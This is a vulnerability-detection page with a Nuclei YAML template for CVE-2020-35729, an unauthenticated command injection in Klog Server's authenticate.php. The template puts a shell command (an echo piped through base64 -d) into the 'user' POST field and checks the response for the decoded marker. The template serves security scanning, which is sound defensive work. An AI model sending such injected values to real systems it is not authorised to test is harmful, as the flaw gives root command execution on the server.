Klog Server <=2.41 - Unauthenticated Command Injection

ID: CVE-2020-35729

Severity: critical

Author: dwisiswant0

Tags: cve,cve2020,klog,rce,klogserver

Description

Klog Server 2.4.1 and prior is susceptible to an unauthenticated command injection vulnerability. The authenticate.php file uses the user HTTP POST parameter in a call to the shell_exec() PHP function without appropriate input validation, allowing arbitrary command execution as the apache user. The sudo configuration permits the Apache user to execute any command as root without providing a password, resulting in privileged command execution as root. Originated from Metasploit module, copyright (c) space-r7.

YAML Source

id: CVE-2020-35729

info:
  name: Klog Server <=2.41 - Unauthenticated Command Injection
  author: dwisiswant0
  severity: critical
  description: Klog Server 2.4.1 and prior is susceptible to an unauthenticated command injection vulnerability. The `authenticate.php` file uses the `user` HTTP POST parameter in a call to the `shell_exec()` PHP function without appropriate input validation, allowing arbitrary command execution as the apache user. The sudo configuration permits the Apache user to execute any command as root without providing a password, resulting in privileged command execution as root. Originated from Metasploit module, copyright (c) space-r7.
  impact: |
    An attacker can execute arbitrary commands on the server, leading to remote code execution and potential compromise of the system.
  remediation: |
    Upgrade to a patched version of Klog Server (>=2.42) or apply the vendor-supplied patch.
  reference:
    - https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection
    - https://nvd.nist.gov/vuln/detail/CVE-2020-35729
    - https://github.com/mustgundogdu/Research/blob/main/KLOG_SERVER/Exploit_Code
    - https://github.com/mustgundogdu/Research/blob/main/KLOG_SERVER/README.md
    - https://github.com/Z0fhack/Goby_POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-35729
    cwe-id: CWE-78
    epss-score: 0.95163
    epss-percentile: 0.99327
    cpe: cpe:2.3:a:klogserver:klog_server:2.4.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: klogserver
    product: klog_server
  tags: cve,cve2020,klog,rce,klogserver
variables:
  dummy: "{{to_lower(rand_text_alpha(5))}}"

http:
  - method: POST
    path:
      - "{{BaseURL}}/actions/authenticate.php"

    body: 'user={{dummy}}%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd={{dummy}}' # Payload: & echo "cHJvamVjdGRpc2NvdmVyeS5pbw==" | base64 -d & echo"
    matchers:
      - type: word
        words:
          - "poc-testing" # from Base64 decoding payload
# digest: 4a0a004730450220317306436d9598cd6e2341b9d74072ee4a5e549ec39b8bfbf3af765de148fa910221008fdc46297e1396444770ad0efc20e7e2eb602b7285fc636143a7aad83a656485:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-35729.yaml"

View on Github